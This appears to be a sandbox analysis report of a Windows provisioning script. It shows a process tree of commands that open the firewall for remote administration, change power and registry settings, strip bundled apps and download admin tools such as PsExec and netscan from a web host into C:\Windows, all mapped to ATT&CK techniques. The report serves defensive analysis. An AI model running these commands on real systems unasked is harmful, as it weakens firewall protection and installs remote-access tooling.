- - C:\Windows\system32\netsh.exe
    netsh advfirewall firewall set rule group="Windows Remote Management" new enable=yes profile=any
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c netsh firewall set service type=remoteadmin enable profile=all
  2⤵
  PID:760
- - C:\Windows\system32\netsh.exe
    netsh firewall set service type=remoteadmin enable profile=all
    3⤵
    - Modifies Windows Firewall
    - Event Triggered Execution: Netsh Helper DLL
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2564
- C:\Windows\system32\powercfg.exe
  powercfg -h off
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1972
- C:\Windows\system32\powercfg.exe
  powercfg -x -hibernate-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2660
- C:\Windows\system32\powercfg.exe
  powercfg -x -hibernate-timeout-dc 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1372
- C:\Windows\system32\powercfg.exe
  powercfg -x -standby-timeout-ac 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2980
- C:\Windows\system32\powercfg.exe
  powercfg -x -standby-timeout-dc 15
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1264
- C:\Windows\system32\powercfg.exe
  powercfg -setacvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:1344
- C:\Windows\system32\powercfg.exe
  powercfg -setdcvalueindex 381b4222-f694-41f0-9685-ff5bb260df2e 19cbb8fa-5279-450e-9fac-8a3d5fedd0c1 12bbebe6-58d6-4636-95bb-3217ef867c1a 0
  2⤵
  - Power Settings
  - Suspicious use of AdjustPrivilegeToken
  PID:2556
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command Get-AppxProvisionedPackage -online | where-object {$_.displayname -like "*OneNote*" -or $_.displayname -like "*bing*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*xbox*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*3DBuilder*" -or $_.displayname -like "*BingFinance*" -or $_.displayname -like "*BingNews*" -or $_.displayname -like "*BingSports*" -or $_.displayname -like "*ConnectivityStore*" -or $_.displayname -like "*MicrosoftOfficeHub*" -or $_.displayname -like "*MicrosoftSolitaireCollection*" -or $_.displayname -like "*OneNote*" -or $_.displayname -like "*Sway*" -or $_.displayname -like "*WindowsMaps*" -or $_.displayname -like "*XboxApp*" -or $_.displayname -like "*ZuneMusic*" -or $_.displayname -like "*ZuneVideo*" -or $_.displayname -like "*xbox*"} | remove-appxprovisionedpackage -online
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:376
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command Get-AppxPackage | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1676
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command Get-AppxPackage -allusers | where-object {$_.name -like "*windowscommunicationsapps*" -or $_.name -like "*officehub*" -or $_.name -like "*skypeapp*" -or $_.name -like "*getstarted*" -or $_.name -like "*zunemusic*" -or $_.name -like "*windowsmaps*" -or $_.name -like "*bingfinance*" -or $_.name -like "*zunevideo*" -or $_.name -like "*bingnews*" -or $_.name -like "*people*" -or $_.name -like "*windowsstore*" -or $_.name -like "*bingsports*" -or $_.name -like "*bingweather*" -or $_.name -like "*xbox*" -or $_.name -like "*candy*" -or $_.name -like "*feed*" -or $_.name -like "*print3d*" -or $_.name -like "*oneconnect*" -or $_.name -like "*solitaire*" -or $_.name -like "*gethelp*" -or $_.name -like "*spotify*" -or $_.name -like "*cooking*" -or $_.name -like "*Microsoft.ZuneVideo*" -or $_.name -like "*Microsoft.People*" -or $_.name -like "*Microsoft.ZuneMusic*" -or $_.name -like "*Getstarted*" -or $_.name -like "*officehub*" -or $_.name -like "*mixed*" -or $_.name -like "*sway*" -or $_.name -like "*yourphone*" -or $_.name -like "*bing*" -or $_.name -like "*skype*" -or $_.name -like "*3d*" -or $_.name -like "*maps*"} | remove-appxpackage -allusers
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:948
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/devcon.exe -outfile C:\windows\devcon.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1740
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Fping.exe -outfile C:\windows\Fping.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2860
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/grep.exe -outfile C:\windows\grep.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/netscan.exe -outfile C:\windows\netscan.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2960
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/nircmd.exe -outfile C:\windows\nircmd.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3016
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/procexp.exe -outfile C:\windows\procexp.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2776
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/Procmon.exe -outfile C:\windows\Procmon.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:832
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/PsExec.exe -outfile C:\windows\PsExec.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:968
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/putty.exe -outfile C:\windows\putty.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:940
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/TreeSizeFree.exe -outfile C:\windows\TreeSizeFree.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1152
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/winmtr.exe -outfile C:\windows\winmtr.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:360
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command invoke-webrequest -uri matt.b-compservices.com/Tools/whois.exe -outfile C:\windows\whois.exe
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg load HKU\default C:\users\default\ntuser.dat
  2⤵
  PID:2088
- - C:\Windows\system32\reg.exe
    reg load HKU\default C:\users\default\ntuser.dat
    3⤵
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    PID:2588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
  2⤵
  PID:2172
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\ContentDeliveryManager" /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:628
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
  2⤵
  PID:2156
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowTaskViewButton /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:3028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
  2⤵
  PID:2612
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Search" /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2216
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
  2⤵
  PID:1716
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\software\microsoft\windows\currentversion\policies\explorer" /v ForceRunonstartmenu /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
  2⤵
  PID:2136
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
  2⤵
  PID:1472
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Hidden /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:3068
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
  2⤵
  PID:1900
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_TrackDocks /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
  2⤵
  PID:1476
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v Start_trackProgs /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2860
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
  2⤵
  PID:1540
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v TaskbarMn /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2992
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
  2⤵
  PID:1524
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People" /v PeopleBand /t REG_DWORD /d 0 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1196
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
  2⤵
  PID:1040
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v StartupPage /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
  2⤵
  PID:864
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\ControlPanel" /v AllItemsIconView /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2656
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:1696
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v Installtheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:1060
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Policies\Microsoft\Windows\Personalization" /v ThemeFile /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:588
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
  2⤵
  PID:1136
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes" /v CurrentTheme /t REG_SZ /d C:\windows\resources\themes\BComp.theme /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
  2⤵
  PID:1016
- - C:\Windows\system32\reg.exe
    reg add "HKU\DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v DontUsePowerShellOnWinX /t REG_DWORD /d 1 /f
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:1716
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg unload HKU\Default
  2⤵
  PID:2188
- - C:\Windows\system32\reg.exe
    reg unload HKU\Default
    3⤵
    - Modifies data under HKEY_USERS
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Suspicious use of AdjustPrivilegeToken
    PID:1988

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Power Settings

T1653

Privilege Escalation

Account Manipulation

T1098

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Hidden Users

T1564.002

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
8aefce3ca88fc5f0578ad85ef4a0c711

SHA1
81a35bc6c4d2105955371c129430cf5c23689c6b

SHA256
5450b54f10fc7937e31a24ddcf2b39aa75974015fb62903a1d319e8fb3d0c8ac

SHA512
c4377719ff5950d89010d0f50e4a07577c75a87567291a72a50d92a93f76192c458693058f5658fc81a63f31708ccdace7f51bcf47c86dc49289fe66f18f4b64

Download Submit
memory/376-15-0x000000001B320000-0x000000001B602000-memory.dmp

Filesize
2.9MB

Download
memory/376-36-0x0000000002320000-0x0000000002328000-memory.dmp

Filesize
32KB

Download